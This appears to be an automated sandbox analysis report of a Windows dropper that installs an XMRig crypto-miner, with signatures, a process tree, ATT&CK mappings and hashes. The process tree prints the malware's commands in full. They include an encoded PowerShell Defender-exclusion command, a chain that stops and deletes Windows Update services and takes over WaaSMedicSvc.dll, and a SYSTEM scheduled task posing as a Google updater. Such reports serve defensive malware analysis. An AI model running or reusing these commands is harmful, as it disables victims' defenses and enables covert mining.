Analysis

  • max time kernel
    337s
  • max time network
    348s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    01-07-2022 04:47

General

  • Target

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe

  • Size

    7.4MB

  • MD5

    26e4e44c3ba14cdaf5a9994192aaf2a5

  • SHA1

    1422aa1e3462da9cf4d96e3ade9310b383c40ebb

  • SHA256

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7

  • SHA512

    18babf7c5ee51848061cff36ffdbab814bf5f6404d067ddd48f16cb168a99a7964c6a6b49cd1e44f222c77527eed2736946ec7bdd484271d243efdf7c51903ad

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe
    "C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:960
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1208
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1044
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1732
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:332
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1152
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1936
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:332
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:596
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:240
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1732
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1308
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1252
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:828
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:596
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1208
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1732
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1936
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1412
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1880
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1604
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:1968
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1116
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:2020
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:1284
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:1512
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:1952
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:1252
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2016
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1316
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1260
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:388
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                            PID:1984
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                          4⤵
                            PID:2028
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                              5⤵
                              • Creates scheduled task(s)
                              PID:1308
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                            4⤵
                              PID:596
                              • C:\Windows\system32\schtasks.exe
                                schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                5⤵
                                  PID:1484
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Windows\Temp\run.bat" "
                            2⤵
                            • Drops startup file
                            PID:1876
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Windows\Temp\lol.bat" "
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:432
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                              3⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              • Suspicious use of WriteProcessMemory
                              PID:1800
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1800 CREDAT:275457 /prefetch:2
                                4⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:112
                        • C:\Windows\system32\conhost.exe
                          \??\C:\Windows\system32\conhost.exe "1603750278-1284988640461604702-2144279491-84277808-1344070719-364645461-921511672"
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1984
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {9186940F-13D7-4F04-9434-F04E4AFD434D} S-1-5-18:NT AUTHORITY\System:Service:
                          1⤵
                          • Loads dropped DLL
                          PID:1048
                          • C:\Program Files\Chrome\updater.exe
                            "C:\Program Files\Chrome\updater.exe"
                            2⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:1648
                            • C:\Windows\System32\conhost.exe
                              "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                              3⤵
                              • Drops file in Drivers directory
                              • Suspicious use of SetThreadContext
                              • Drops file in Program Files directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1936
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                                4⤵
                                  PID:2016
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                                    5⤵
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1644
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                  4⤵
                                    PID:1288
                                    • C:\Windows\system32\sc.exe
                                      sc stop UsoSvc
                                      5⤵
                                      • Launches sc.exe
                                      PID:568
                                    • C:\Windows\system32\sc.exe
                                      sc stop WaaSMedicSvc
                                      5⤵
                                      • Launches sc.exe
                                      PID:280
                                    • C:\Windows\system32\sc.exe
                                      sc stop wuauserv
                                      5⤵
                                      • Launches sc.exe
                                      PID:1504
                                    • C:\Windows\system32\sc.exe
                                      sc stop bits
                                      5⤵
                                      • Launches sc.exe
                                      PID:2000
                                    • C:\Windows\system32\sc.exe
                                      sc stop dosvc
                                      5⤵
                                      • Launches sc.exe
                                      PID:1728
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1688
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1120
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1500
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1648
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1780
                                    • C:\Windows\system32\takeown.exe
                                      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                      5⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:560
                                    • C:\Windows\system32\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                      5⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:1252
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:2020
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1648
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1780
                                    • C:\Windows\system32\reg.exe
                                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                      5⤵
                                      • Modifies registry key
                                      PID:1284
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                      5⤵
                                        PID:1728
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                        5⤵
                                          PID:1688
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                          5⤵
                                            PID:1692
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                            5⤵
                                              PID:1328
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                              5⤵
                                                PID:1780
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                5⤵
                                                  PID:1500
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                  5⤵
                                                    PID:1628
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                    PID:2000
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -hibernate-timeout-ac 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1644
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -hibernate-timeout-dc 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1500
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -standby-timeout-ac 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:280
                                                    • C:\Windows\system32\powercfg.exe
                                                      powercfg /x -standby-timeout-dc 0
                                                      5⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1252
                                                  • C:\Windows\System32\conhost.exe
                                                    C:\Windows\System32\conhost.exe
                                                    4⤵
                                                      PID:1692
                                                      • C:\Windows\System32\conhost.exe
                                                        "C:\Windows\System32\conhost.exe" "mjadcdpvfkxx"
                                                        5⤵
                                                          PID:1612
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe mkapcxrks1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1484

                                                Network

                                                MITRE ATT&CK Matrix ATT&CK v6

                                                Execution

                                                Scheduled Task

                                                1
                                                T1053

                                                Persistence

                                                Modify Existing Service

                                                2
                                                T1031

                                                Scheduled Task

                                                1
                                                T1053

                                                Privilege Escalation

                                                Scheduled Task

                                                1
                                                T1053

                                                Defense Evasion

                                                Modify Registry

                                                3
                                                T1112

                                                Virtualization/Sandbox Evasion

                                                1
                                                T1497

                                                Impair Defenses

                                                1
                                                T1562

                                                File Permissions Modification

                                                1
                                                T1222

                                                Discovery

                                                Query Registry

                                                2
                                                T1012

                                                Virtualization/Sandbox Evasion

                                                1
                                                T1497

                                                System Information Discovery

                                                3
                                                T1082

                                                Impact

                                                Service Stop

                                                1
                                                T1489

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Program Files\Chrome\updater.exe
                                                  Filesize

                                                  7.1MB

                                                  MD5

                                                  e5373f1e2c782659695c5cea587fddea

                                                  SHA1

                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                  SHA256

                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                  SHA512

                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                • C:\Program Files\Chrome\updater.exe
                                                  Filesize

                                                  7.1MB

                                                  MD5

                                                  e5373f1e2c782659695c5cea587fddea

                                                  SHA1

                                                  4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                  SHA256

                                                  c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                  SHA512

                                                  2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  60KB

                                                  MD5

                                                  589c442fc7a0c70dca927115a700d41e

                                                  SHA1

                                                  66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                  SHA256

                                                  2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                  SHA512

                                                  1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                  Filesize

                                                  340B

                                                  MD5

                                                  1452ef20e42336faf04485541947f462

                                                  SHA1

                                                  1749546496cd8199b21c4d9cd8104c019406d971

                                                  SHA256

                                                  76535166c3ddf43d18e5932606c57350566e6b44b3138dc0bcf01974c1d30584

                                                  SHA512

                                                  0800d0862c5e5d25fdf7d1645ae6d80b75166fdfa40f28e4f1399b2cb645b1509aac4bb0a87e00fb8b25926fd5ed9d2ce1d73fdc7572ca232c6abdb757415c7a

                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HAOVXHW3.txt
                                                  Filesize

                                                  603B

                                                  MD5

                                                  fc3a499c6558d40bfd703b83cf076ca4

                                                  SHA1

                                                  9aab62f8186d7f3ff80fae97115912d5752510b3

                                                  SHA256

                                                  535accd5ba60070b9aa41e6971601095ece749238180eb0a5a274bd8b09aed95

                                                  SHA512

                                                  dbc6f39b2d8438bdb6bfe4543748fdb28064241b4b4fa56b9397670d61b1d92d38bbd3f8882669109f2a237377356a604269c5008b934a758a88a652fc7bfaeb

                                                • C:\Windows\Temp\lol.bat
                                                  Filesize

                                                  59B

                                                  MD5

                                                  f580e0e80cc87b25e38ea2c0c8059d04

                                                  SHA1

                                                  299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                  SHA256

                                                  9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                  SHA512

                                                  5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                • C:\Windows\Temp\run.bat
                                                  Filesize

                                                  98B

                                                  MD5

                                                  731afe244b2414169a5f630d52646e56

                                                  SHA1

                                                  e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                  SHA256

                                                  6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                  SHA512

                                                  84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

